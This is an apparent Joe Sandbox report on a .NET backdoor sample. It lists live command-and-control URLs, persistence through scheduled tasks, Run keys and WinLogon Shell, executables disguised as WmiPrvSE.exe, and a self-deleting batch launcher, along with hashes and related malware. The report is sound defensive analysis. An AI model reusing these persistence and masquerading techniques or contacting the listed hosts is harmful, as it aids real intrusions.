                                https://steamcommunity.com/profiles/WmiPrvSE.exe, 00000009.00000002.1760913066.0000000002931000.00000004.00000800.00020000.00000000.sdmpfalse
                                  high
                                  http://host1835875.hostland.pro/Lowlongpolltest.php?vsUBxK4ppQZ8aDT8iyUE4KfcwtSFC=9aubHCzwLXJHHcAcgfWmiPrvSE.exe, 00000012.00000002.2531367222.0000000002DCE000.00000004.00000800.00020000.00000000.sdmp, WmiPrvSE.exe, 00000012.00000002.2531367222.0000000002DA7000.00000004.00000800.00020000.00000000.sdmpfalse
                                    high
                                    http://host1835875.hostland.pro/WmiPrvSE.exe, 00000012.00000002.2531367222.0000000002CB5000.00000004.00000800.00020000.00000000.sdmpfalse
                                      high
                                      http://host1835875.hostland.pro/Lowlongpolltest.php?fpx0A0VKNNT3jT2dNBkuvNR98C5s=1yQEvZAPO2s&3998e4bWmiPrvSE.exe, 00000009.00000002.1760913066.0000000002AC8000.00000004.00000800.00020000.00000000.sdmp, WmiPrvSE.exe, 00000009.00000002.1760913066.0000000002A9F000.00000004.00000800.00020000.00000000.sdmpfalse
                                        high
                                        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namehui.exe, 00000004.00000002.1741908323.0000000002619000.00000004.00000800.00020000.00000000.sdmp, WmiPrvSE.exe, 00000009.00000002.1760913066.0000000002A9F000.00000004.00000800.00020000.00000000.sdmp, WmiPrvSE.exe, 00000012.00000002.2531367222.0000000002DA7000.00000004.00000800.00020000.00000000.sdmpfalse
                                          high
                                          http://host1835875.hostland.proWmiPrvSE.exe, 00000012.00000002.2531367222.0000000002DCE000.00000004.00000800.00020000.00000000.sdmp, WmiPrvSE.exe, 00000012.00000002.2531367222.0000000002DA7000.00000004.00000800.00020000.00000000.sdmp, WmiPrvSE.exe, 00000012.00000002.2531367222.0000000002DC4000.00000004.00000800.00020000.00000000.sdmpfalse
                                            high
                                            https://research.activision.com/opensourceDHEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe, hui.exe.0.dr, WmiPrvSE.exe.4.dr, KQihinlofznONtA.exe.4.dr, WmiPrvSE.exe0.4.drfalse
                                              high
                                              • No. of IPs < 25%
                                              • 25% < No. of IPs < 50%
                                              • 50% < No. of IPs < 75%
                                              • 75% < No. of IPs
                                              IPDomainCountryFlagASNASN NameMalicious
                                              185.26.122.79
                                              host1835875.hostland.proRussian Federation
                                              62082HOSTLANDRUfalse
                                              Joe Sandbox Version:38.0.0 Ammolite
                                              Analysis ID:1337252
                                              Start date and time:2023-11-05 14:26:05 +01:00
                                              Joe Sandbox Product:CloudBasic
                                              Overall analysis duration:0h 7m 49s
                                              Hypervisor based Inspection enabled:false
                                              Report type:full
                                              Cookbook file name:default.jbs
                                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                              Number of analysed new started processes analysed:20
                                              Number of new started drivers analysed:0
                                              Number of existing processes analysed:0
                                              Number of existing drivers analysed:0
                                              Number of injected processes analysed:0
                                              Technologies:
                                              • HCA enabled
                                              • EGA enabled
                                              • AMSI enabled
                                              Analysis Mode:default
                                              Analysis stop reason:Timeout
                                              Sample file name:HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe
                                              Detection:MAL
                                              Classification:mal100.troj.evad.winEXE@24/15@1/1
                                              EGA Information:
                                              • Successful, ratio: 16.7%
                                              HCA Information:
                                              • Successful, ratio: 86%
                                              • Number of executed functions: 440
                                              • Number of non-executed functions: 96
                                              Cookbook Comments:
                                              • Found application associated with file extension: .exe
                                              • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                              • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                              • Execution Graph export aborted for target KQihinlofznONtA.exe, PID 5084 because it is empty
                                              • Execution Graph export aborted for target WmiPrvSE.exe, PID 4136 because it is empty
                                              • Execution Graph export aborted for target WmiPrvSE.exe, PID 6476 because it is empty
                                              • Execution Graph export aborted for target hui.exe, PID 5664 because it is empty
                                              • Execution Graph export aborted for target hui.exe, PID 7000 because it is empty
                                              • Not all processes where analyzed, report is missing behavior information
                                              • Report size exceeded maximum capacity and may have missing behavior information.
                                              • Report size exceeded maximum capacity and may have missing disassembly code.
                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                              • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                              • Report size getting too big, too many NtQueryValueKey calls found.
                                              TimeTypeDescription
                                              13:27:03Task SchedulerRun new task: KQihinlofznONtA path: "C:\PerfLogs\KQihinlofznONtA.exe"
                                              13:27:03Task SchedulerRun new task: WmiPrvSE path: "C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\WmiPrvSE.exe"
                                              13:27:04AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run KQihinlofznONtA "C:\PerfLogs\KQihinlofznONtA.exe"
                                              13:27:12AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run WmiPrvSE "C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\WmiPrvSE.exe"
                                              13:27:21AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run KQihinlofznONtA "C:\PerfLogs\KQihinlofznONtA.exe"
                                              13:27:29AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run WmiPrvSE "C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\WmiPrvSE.exe"
                                              13:27:37AutostartRun: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run KQihinlofznONtA "C:\PerfLogs\KQihinlofznONtA.exe"
                                              13:27:45AutostartRun: HKLM64\Software\Microsoft\Windows\CurrentVersion\Run WmiPrvSE "C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\WmiPrvSE.exe"
                                              13:28:02AutostartRun: WinLogon Shell "C:\PerfLogs\KQihinlofznONtA.exe"
                                              13:28:10AutostartRun: WinLogon Shell "C:\PerfLogs\WmiPrvSE.exe"
                                              13:28:18AutostartRun: WinLogon Shell "C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\WmiPrvSE.exe"
                                              14:27:05API Interceptor8x Sleep call for process: WmiPrvSE.exe modified
                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                              185.26.122.798uV9c7vuZC.exeGet hashmaliciousRaccoon Stealer v2, RedLine, SmokeLoaderBrowse
                                              • host1848185.hostland.pro/ed.exe
                                              No context
                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                              HOSTLANDRUyk2Eh24FDd.exeGet hashmaliciousUnknownBrowse
                                              • 185.26.122.81
                                              hT0xyYJthf.exeGet hashmaliciousUnknownBrowse
                                              • 185.26.122.81
                                              https://hideuri.com/EXWJgmGet hashmaliciousUnknownBrowse
                                              • 185.26.122.79
                                              rwDENO48jg.elfGet hashmaliciousMirai, MoobotBrowse
                                              • 185.221.215.184
                                              i21878JK11.exeGet hashmaliciousDCRatBrowse
                                              • 185.26.122.80
                                              i21878JK11.exeGet hashmaliciousDCRatBrowse
                                              • 185.26.122.80
                                              Transaccions DOC-REF DX739475.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                              • 185.26.122.9
                                              2D9643297F94E7AF81915ADAA5F1BA01D2809449B1DE2.exeGet hashmaliciousAzorultBrowse
                                              • 185.26.122.8
                                              8uV9c7vuZC.exeGet hashmaliciousRaccoon Stealer v2, RedLine, SmokeLoaderBrowse
                                              • 185.26.122.79
                                              New Order Requirement.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                              • 185.26.122.20
                                              SzW3mTP02wGet hashmaliciousUnknownBrowse
                                              • 185.26.120.181
                                              7XshR39SUpGet hashmaliciousUnknownBrowse
                                              • 185.26.120.181
                                              u6cMNSKOuKGet hashmaliciousUnknownBrowse
                                              • 185.26.120.181
                                              QkP4aKN7XmGet hashmaliciousUnknownBrowse
                                              • 185.26.120.181
                                              h8Z5dNxYstGet hashmaliciousUnknownBrowse
                                              • 185.26.120.181
                                              Hl0Kvg9khcGet hashmaliciousUnknownBrowse
                                              • 185.26.120.181
                                              cFg27QO2JfGet hashmaliciousUnknownBrowse
                                              • 185.26.120.181
                                              2NL8q5uKnfGet hashmaliciousMiraiBrowse
                                              • 185.26.120.181
                                              sIBZbSbh7f.exeGet hashmaliciousDCRatBrowse
                                              • 185.26.122.20
                                              HBW PAYMENT LIST FOR 2021,20210809.xlsxGet hashmaliciousFormBookBrowse
                                              • 185.26.122.58
                                              No context
                                              No context
                                              Process:C:\Users\user\AppData\Roaming\Adobe\hui.exe
                                              File Type:ASCII text, with very long lines (448), with no line terminators
                                              Category:dropped
                                              Size (bytes):448
                                              Entropy (8bit):5.832471188424169
                                              Encrypted:false
                                              SSDEEP:12:E9gU+g/NWq6FcbaMrFkTpIUuVM5dOlGfHKVL7VnOFigm:ECU+ruC9CasLMm
                                              MD5:C5602D2775DA47AF4CDD8990DBE8DB5F
                                              SHA1:85F3436A7F79804153DE06FCA735FCEA0E86CDF7
                                              SHA-256:755BA2478C9CA716AB00891AAB8CFAFDD7438D1100C39C63B2C8C9DB478354D7
                                              SHA-512:F3A1D21A8DE880F22D579B833BEC4C60082D763F608E535F99F7390B5A9D348480461B52E7BD203E83F5E9039317048B2D349E613FEF25CC46E3D9171488FF3E
                                              Malicious:false
                                              Reputation:low
                                              Preview:zuCT7la06RNRJkV45eQyMOt97j5QvB2R9lMERM3RXjCJqquBhDQoDWPkADWYpJE5Z6RhXQmtk8bmLkTQy3ssvNNnWlEOzemNfHtuZMoQahDE5mZZuFkvaWJMsoLvMY3GWNGD1i1mPbROJJrtMoeu40xJ8hCvB3ECn7rsfViLN8f9E5Ci6bih4JLfa7FTgGkWXPkMb9N0GSg6UxEDfdyjUgIewMShQOoHXJlzU0H7OsblmOLm3CyDRBB1GGZPrpj2oZjKMOsoV1VlEh1iApoOZlzVHtsNa2PiIj6NoAZpTJraqawjO1OBBVcDjNCcffOdlwdfko3AQ95Q3Zpr7J9jnOhxG3oa76Jy5Ny37R9k7NuCaMJKiVfWfo0XPpYqAdDTzHUqkvuqJZmZefX4ue2mawSQXbnR2TkeKaMS1cjwkzNGCa2uSe5fla3DyESJIdxz
                                              Process:C:\Users\user\AppData\Roaming\Adobe\hui.exe
                                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                              Category:dropped
                                              Size (bytes):944128
                                              Entropy (8bit):6.079052617493347
                                              Encrypted:false
                                              SSDEEP:12288:6r2SWfasLDVGtSOG77ZJ99QxsLKdyfbBsBdB8KYVQ66BrPO9lLeJgNdrgqn4:6avL5BH7pdKk+BSjLeuNVg+4
                                              MD5:1B46DAD7064609344351AC9EFE3F9AAB
                                              SHA1:9AA8051F5EF6F800410EC669E52B415B6BF43816
                                              SHA-256:3BD60F927E3882940077FA527712E5C55A2767564B39A932C4D4941E190A4C81
                                              SHA-512:CE773799E73F0B61A793098DF7A824346EC1D94D16877A272ACE42A644D4FDF7D6A68B4A7C976B4B90471036F0D68B56BBFEC18CFFC68331C32970E7DB7C57C4
                                              Malicious:true
                                              Yara Hits:
                                              • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\PerfLogs\KQihinlofznONtA.exe, Author: Joe Security
                                              Antivirus:
                                              • Antivirus: Avira, Detection: 100%
                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                              • Antivirus: ReversingLabs, Detection: 88%
                                              • Antivirus: Virustotal, Detection: 61%, Browse
                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....+Va.....................Z......^)... ...@....@.. ....................................@..................................)..K.......X............................................................................ ............... ..H............text...d.... ...................... ..`.sdata...R...@...T..................@....rsrc...X............b..............@..@.reloc...............f..............@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                              Process:C:\Users\user\AppData\Roaming\Adobe\hui.exe
                                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                              Category:dropped
                                              Size (bytes):944128
                                              Entropy (8bit):6.079052617493347
                                              Encrypted:false
                                              SSDEEP:12288:6r2SWfasLDVGtSOG77ZJ99QxsLKdyfbBsBdB8KYVQ66BrPO9lLeJgNdrgqn4:6avL5BH7pdKk+BSjLeuNVg+4
                                              MD5:1B46DAD7064609344351AC9EFE3F9AAB
                                              SHA1:9AA8051F5EF6F800410EC669E52B415B6BF43816
                                              SHA-256:3BD60F927E3882940077FA527712E5C55A2767564B39A932C4D4941E190A4C81
                                              SHA-512:CE773799E73F0B61A793098DF7A824346EC1D94D16877A272ACE42A644D4FDF7D6A68B4A7C976B4B90471036F0D68B56BBFEC18CFFC68331C32970E7DB7C57C4
                                              Malicious:true
                                              Yara Hits:
                                              • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\PerfLogs\WmiPrvSE.exe, Author: Joe Security
                                              • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\PerfLogs\WmiPrvSE.exe, Author: Joe Security
                                              Antivirus:
                                              • Antivirus: Avira, Detection: 100%
                                              • Antivirus: Avira, Detection: 100%
                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                              • Antivirus: ReversingLabs, Detection: 88%
                                              • Antivirus: Virustotal, Detection: 61%, Browse
                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....+Va.....................Z......^)... ...@....@.. ....................................@..................................)..K.......X............................................................................ ............... ..H............text...d.... ...................... ..`.sdata...R...@...T..................@....rsrc...X............b..............@..@.reloc...............f..............@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                              Process:C:\Users\user\AppData\Roaming\Adobe\hui.exe
                                              File Type:ASCII text, with very long lines (392), with no line terminators
                                              Category:dropped
                                              Size (bytes):392
                                              Entropy (8bit):5.847265379838702
                                              Encrypted:false
                                              SSDEEP:12:Cxb3qtV4MCUCkmtxRiogB++EdKEQBEQcPYO6r0:NbQrtx5f4Eu0g0
                                              MD5:AA3AE47C11C8C56F211E5309282E3BB8
                                              SHA1:DA8D52320EA4900D6423893A21DBA1C8E0655E15
                                              SHA-256:4C71ADDB7F681ABE785EBD5E6FD14D55911E224F0226C0EB512A5EC6AB156A2D
                                              SHA-512:9B3FB8CE06903BC25179309093E7440BACEE149DFB21B76785326C6DB440D98553D291A5836810AE15A4ABD072F2D582FE514B0F6ABA3D49559420890E6E8932
                                              Malicious:false
                                              Preview:PdtYXmmC5tQuxfNe8kAfbhziDkUc4JDtx8N8qyiaI1KKpnXTUHchAw6soLUwSKHwqg7yRPxJCkWkWo3ZNAHxqfsBCfUfdvI8tXdJqiBFTSfZZVV9R4jRDUGKx6ww4RqQcY09Luto9BdY9TmqJUNiL04YRTVtwPKBmP7AeWyhL5SC1sKeUGmjDHEldbr2Y92t0bvuVlLxgqXQi2hjI0Zqmk8fKWgDo6JLDiLZ6aJs4zDXtyCl4IthkMHPdQj8FIIkgMNArImrrrvxhkwWU5IgMll1a55q0Knwqc0glB3vgB02aTr3eNoK9mY5lVkvM61hE8HFtPvSBXAKusaGNCMnfcxDD55PbIjjKTycMmJObWJmmOL25dhJtNBlLDCyUg12xa9b374l
                                              Process:C:\Users\user\AppData\Roaming\Adobe\hui.exe
                                              File Type:ASCII text, with very long lines (390), with no line terminators
                                              Category:dropped
                                              Size (bytes):390
                                              Entropy (8bit):5.8092298208441004
                                              Encrypted:false
                                              SSDEEP:12:7/tTWOgcj4kXBtIRutChvAxuSXUkFSdZ+7yXvHu0WA4z:7FTAkXzI0U2UkFSK7y/Hu0a
                                              MD5:AFFCA6FAF11C0FB75D13964A62505DAA
                                              SHA1:A5E5FA49BC6D651BBD00763054BAF44C87D605B5
                                              SHA-256:FCD95AC92E492DA64789A950A6FB2FF3B1FB5CCA06AAF009796E4084CA98036C
                                              SHA-512:DD264EFB4EEC4DAE9EB1465CB069EA87BF27EDFD31BCCA9A3EFD2C08C7CCDFC8F035BEABD3C48ED1ED6168E867F66AC1CCD2520F1A30F4462B2470337F5542AB
                                              Malicious:false
                                              Preview:XE3thIdxKZoGBXR4LzbObnkfZRdnzVkPeacuOffKkPHfb4jM4Tvsbu6udXUPo07yyYll5gpqURnMfFEesRsgj2yudrR1KPftRTqCS7RXnFYJGuOYS0hXIbP6k1INPyfEv44MYCLuAU2ddootd2iUrIl0DubbzDIzkTYMzBAQoxWxivc6MYtWPKWnSEInku46MC3KPc3c2Rp4wxRSReObUvjZ6u3v2Wq42Zlg2SqufRd8fc1fw0VFfdmacdNfiHjglvCWLva9yd5DRl4e3Y8BAkZYxLDYFLMXr7WtZeTBaWRBhjI1jslKJhgBWojAsB4mRiVUPKFYE7lnSX0OCMyWkBOJbUXv5STYcpu9NylYnMFL62t9xV7gNhCPUM24xTcwoNLmn1
                                              Process:C:\Users\user\AppData\Roaming\Adobe\hui.exe
                                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                              Category:dropped
                                              Size (bytes):944128
                                              Entropy (8bit):6.079052617493347
                                              Encrypted:false
                                              SSDEEP:12288:6r2SWfasLDVGtSOG77ZJ99QxsLKdyfbBsBdB8KYVQ66BrPO9lLeJgNdrgqn4:6avL5BH7pdKk+BSjLeuNVg+4
                                              MD5:1B46DAD7064609344351AC9EFE3F9AAB
                                              SHA1:9AA8051F5EF6F800410EC669E52B415B6BF43816
                                              SHA-256:3BD60F927E3882940077FA527712E5C55A2767564B39A932C4D4941E190A4C81
                                              SHA-512:CE773799E73F0B61A793098DF7A824346EC1D94D16877A272ACE42A644D4FDF7D6A68B4A7C976B4B90471036F0D68B56BBFEC18CFFC68331C32970E7DB7C57C4
                                              Malicious:true
                                              Antivirus:
                                              • Antivirus: ReversingLabs, Detection: 88%
                                              • Antivirus: Virustotal, Detection: 61%, Browse
                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....+Va.....................Z......^)... ...@....@.. ....................................@..................................)..K.......X............................................................................ ............... ..H............text...d.... ...................... ..`.sdata...R...@...T..................@....rsrc...X............b..............@..@.reloc...............f..............@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                              Process:C:\PerfLogs\KQihinlofznONtA.exe
                                              File Type:CSV text
                                              Category:dropped
                                              Size (bytes):1510
                                              Entropy (8bit):5.380493107040482
                                              Encrypted:false
                                              SSDEEP:24:ML9E4KQ71qE4GIs0E4KCKDE4KGKZI6Kh6+84xp3/VclSKIE4TKBGKoZAE4KKUNb:MxHKQ71qHGIs0HKCYHKGSI6o6+vxp3/l
                                              MD5:EC75759911B88E93A2B5947380336033
                                              SHA1:4D1472BBA520DBF76449567159CD927E94454210
                                              SHA-256:5BFBF7B8E9F9E89881AD3B4E1214A3F0E9F9E36F72A41143226F4DB9E4642E5D
                                              SHA-512:EF017C70BFB6464CA040FA12C04CE42F9E611D1F79F123F0A7AF7E6CD80002678E1BB97EB835EAF42F7E37B940833CE8422566340A5398115FBB10FC6CCB76C5
                                              Malicious:false
                                              Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64
                                              Process:C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\WmiPrvSE.exe
                                              File Type:CSV text
                                              Category:dropped
                                              Size (bytes):1510
                                              Entropy (8bit):5.380493107040482
                                              Encrypted:false
                                              SSDEEP:24:ML9E4KQ71qE4GIs0E4KCKDE4KGKZI6Kh6+84xp3/VclSKIE4TKBGKoZAE4KKUNb:MxHKQ71qHGIs0HKCYHKGSI6o6+vxp3/l
                                              MD5:EC75759911B88E93A2B5947380336033
                                              SHA1:4D1472BBA520DBF76449567159CD927E94454210
                                              SHA-256:5BFBF7B8E9F9E89881AD3B4E1214A3F0E9F9E36F72A41143226F4DB9E4642E5D
                                              SHA-512:EF017C70BFB6464CA040FA12C04CE42F9E611D1F79F123F0A7AF7E6CD80002678E1BB97EB835EAF42F7E37B940833CE8422566340A5398115FBB10FC6CCB76C5
                                              Malicious:false
                                              Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64
                                              Process:C:\Users\user\AppData\Roaming\Adobe\hui.exe
                                              File Type:CSV text
                                              Category:dropped
                                              Size (bytes):1969
                                              Entropy (8bit):5.37489905566343
                                              Encrypted:false
                                              SSDEEP:48:MxHKQ71qHGIs0HKCYHKGSI6o6+vxp3/elStHTHhAHKKkhHNpaHKlT4x:iq+wmj0qCYqGSI6o9Zp/elStzHeqKkh2
                                              MD5:40B0737D9E519BE2FAE92D41EE16B42F
                                              SHA1:57A1EE0799583C2FDFE12AB3721B872A7B669D97
                                              SHA-256:3F0A9499BDFBC87F5AE57306FFEEEA7388214D9AD47CB12050A54F7DC64E7625
                                              SHA-512:EF059C601229B4A945A5A29A69802D733A525761B3FDA029D2E9B486F400DA2105A0EA88D0F02A90AED1BA1A2335CB5A122B28A93BF54B6C3D8C6FFE4066B28B
                                              Malicious:false
                                              Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64
                                              Process:C:\Users\user\AppData\Roaming\Adobe\hui.exe
                                              File Type:ASCII text, with no line terminators
                                              Category:dropped
                                              Size (bytes):25
                                              Entropy (8bit):4.163856189774724
                                              Encrypted:false
                                              SSDEEP:3:jZNxZGkQd:jZjZGj
                                              MD5:247285734A0D7E90672181936B5022B8
                                              SHA1:775EDDEDCFD585DDE08B4920DEFAD10B952EB209
                                              SHA-256:A6DE411F2020850B26180DBF0DEF9A66E26D21A288567D8915350C3A410104A0
                                              SHA-512:23B5372D40EC1BF9DBAB19D217592C8BE7E98960D6646EE826BE8AC000AAD8122F01BCFD08A53D294E9644C515EF99097EDA0FE808482C8AF4403366D96BBB68
                                              Malicious:false
                                              Preview:kUxL4neoB5rkTuThtqGV6Ut5x
                                              Process:C:\Users\user\AppData\Roaming\Adobe\hui.exe
                                              File Type:DOS batch file, ASCII text, with CRLF line terminators
                                              Category:dropped
                                              Size (bytes):220
                                              Entropy (8bit):5.139808282350787
                                              Encrypted:false
                                              SSDEEP:6:hCijTg3Nou11r+DE1wknaZ53iyKOZG1wkn23ft3RH:HTg9YDEmrHSoflhH
                                              MD5:9E6FEE868BCC87EB8224D235099753F1
                                              SHA1:795F938BCC02AEC2F168A8888943F73B086B9190
                                              SHA-256:6D8EFD27A03012A3F08B28F4585113007F07442AE844BEA12822667595CD34FA
                                              SHA-512:8FFA3DC7C6E089297097FD3408CE8EFFAF8863EEB6E5361E1331206A134B9E117D6B334F66B8C7765736F88FE9D2ADF846E6E2253341EC779BA14367B7787FB6
                                              Malicious:true
                                              Antivirus:
                                              • Antivirus: Avira, Detection: 100%
                                              Preview:@echo off..chcp 65001..w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 1>nul..start "" "C:\Users\user\AppData\Roaming\Adobe\hui.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\zoUR8TSZV2.bat"
                                              Process:C:\Users\user\Desktop\HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe
                                              File Type:ASCII text, with no line terminators
                                              Category:dropped
                                              Size (bytes):25
                                              Entropy (8bit):3.973660689688185
                                              Encrypted:false
                                              SSDEEP:3:BtuEn:Btrn
                                              MD5:E7F48AA75E0FB6A5FF062767274B118A
                                              SHA1:35708E08C6FD4F4D5B90D205535EAF614F616947
                                              SHA-256:75D94792B854EDF88578815103AE48089E1CB0566C97C86BC3B3ECF5373778D7
                                              SHA-512:85D827E4D81A7612AE78FEDA079F1A82812D7A430643DB6BB3863C3CFE618649EB15B574C367D070C6FC594EBAF1C8ADA66390279C703F7EB88E2C8B9A21ADCB
                                              Malicious:false
                                              Preview:"%AppData%\Adobe\hui.exe"
                                              Process:C:\Users\user\Desktop\HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe
                                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                              Category:dropped
                                              Size (bytes):944128
                                              Entropy (8bit):6.079052617493347
                                              Encrypted:false
                                              SSDEEP:12288:6r2SWfasLDVGtSOG77ZJ99QxsLKdyfbBsBdB8KYVQ66BrPO9lLeJgNdrgqn4:6avL5BH7pdKk+BSjLeuNVg+4
                                              MD5:1B46DAD7064609344351AC9EFE3F9AAB
                                              SHA1:9AA8051F5EF6F800410EC669E52B415B6BF43816
                                              SHA-256:3BD60F927E3882940077FA527712E5C55A2767564B39A932C4D4941E190A4C81
                                              SHA-512:CE773799E73F0B61A793098DF7A824346EC1D94D16877A272ACE42A644D4FDF7D6A68B4A7C976B4B90471036F0D68B56BBFEC18CFFC68331C32970E7DB7C57C4
                                              Malicious:true
                                              Yara Hits:
                                              • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Roaming\Adobe\hui.exe, Author: Joe Security
                                              Antivirus:
                                              • Antivirus: Avira, Detection: 100%
                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                              • Antivirus: ReversingLabs, Detection: 88%
                                              • Antivirus: Virustotal, Detection: 61%, Browse
                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....+Va.....................Z......^)... ...@....@.. ....................................@..................................)..K.......X............................................................................ ............... ..H............text...d.... ...................... ..`.sdata...R...@...T..................@....rsrc...X............b..............@..@.reloc...............f..............@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                              Process:C:\Users\user\Desktop\HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):219
                                              Entropy (8bit):5.878700717848975
                                              Encrypted:false
                                              SSDEEP:6:Gx0wqK+NkLzWbHo18nZNDd3RL1wQJRZ7hqKqTWWaWs:GxFMCzWLo14d3XBJr7EmWc
                                              MD5:70E5D6CDF95E6C8BD3CB92A5F27B41F1
                                              SHA1:2139D28EC203B8E56A4D4B5F35CDC971711EE16B
                                              SHA-256:DDBB5359838904C2276556B9E509443FFECBA2EF2C15C97370F0A0DF01A22A0D
                                              SHA-512:B49E59956FE3B04980C2E9BA174DA14239277B64C15A0D4CEF2AF1976BBAF9C7FEC4A430AFA1C1F56563A9F70B6D6339872BE7DD847597A84B2A52730B399F3D
                                              Malicious:true
                                              Antivirus:
                                              • Antivirus: Avira, Detection: 100%
